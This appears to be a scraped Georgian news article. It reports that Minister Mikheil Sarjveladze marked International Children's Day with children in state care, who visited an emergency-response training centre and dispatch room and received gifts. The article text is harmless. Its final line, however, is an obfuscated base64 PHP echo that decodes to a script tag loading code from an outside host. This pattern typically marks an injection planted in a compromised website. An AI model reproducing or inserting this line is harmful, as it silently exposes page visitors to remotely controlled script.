celsiusi
ავერსი საქკაბელი

 ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის მინისტრმა მიხეილ სარჯველაძემ, სახელმწიფო მზრუნველობაში მყოფ ბავშვებს ბავშვთა საერთაშორისო დღე მიულოცა.

ზრუნვაში მყოფ ბავშვებს, სამინისტროს წარმომადგენლებმა, საგანგებო სიტუაციების კოორდინაციისა და გადაუდებელი დახმარების სასწავლო -სატრენინგო ცენტრში უმასპინძლეს, სადაც ცენტრის დირექტორმა ალექსანდრე კუტიბაშვილმა და ინსტრუქტორებმა მოზარდებს ადგილზე გააცნეს, თუ, როგორ ტარდება პირველადი სამედიცინო დახმარება. პრაქტიკული ნაწილის შემდეგ კი,ცენტრის წარმომადგენლებმა მოზარდებს სასწრაფო დახმარების ავტომობილები და სამედიცინო მოტო ტრანსპორტი დაათვალიერებინეს.

სახელმწიფო მზრუნველობაში მყოფი ბავშვები ასევე, საგანგებო სიტუაციების კოორდინაციისა და გადაუდებელი დახმარების ცენტრის ადმინისტრაციულ შენობაშიც იმყოფებოდნენ, სადაც მიხეილ სარჯველაძემ მათ ცენტრალური სადისპეტჩეროს მუშაობის პრინციპი და სპეციფიკა გააცნო.

დასასრულს, მინისტრმა მოზარდებს საჩუქრები გადასცა.

181
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");